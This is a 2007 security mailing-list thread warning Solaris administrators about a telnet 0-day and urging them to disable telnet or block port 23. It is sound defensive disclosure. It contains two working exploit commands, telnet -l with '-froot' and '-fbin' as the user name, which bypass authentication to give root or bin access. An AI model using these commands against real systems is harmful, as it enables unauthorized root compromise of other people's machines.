[Dshield] Solaris Telnet 0-day (Important!)

K K kkadow at gmail.com
Mon Feb 12 03:38:49 GMT 2007


On 2/11/07, Johannes B. Ullrich <jullrich at sans.org> wrote:
> If you run Solaris, please check if you got telnet enabled NOW. If you
> can, block port 23 at your perimeter. There is a fairly trivial Solaris
> telnet 0-day.
>
> telnet -l "-froot" [hostname]
>
> will give you root on many Solaris systems with default installs
> We are still testing. Please use our contact form at
> https://isc.sans.org/contact.html

On systems where the above fails with "Not on system console", don't
assume that the machine is secure, because the following does work,
and is one step from root:

telnet -l "-fbin" [hostname]

Gadi Evron <ge at linuxbox.org>  wrote:
>. If Solaris 10 & 11 are truly vulnerable to this bug,
> Sun deserves a  *swift* kick to the head.

The above is from my testing with Solaris 10, so get ready to start kicking...

Kevin


More information about the list mailing list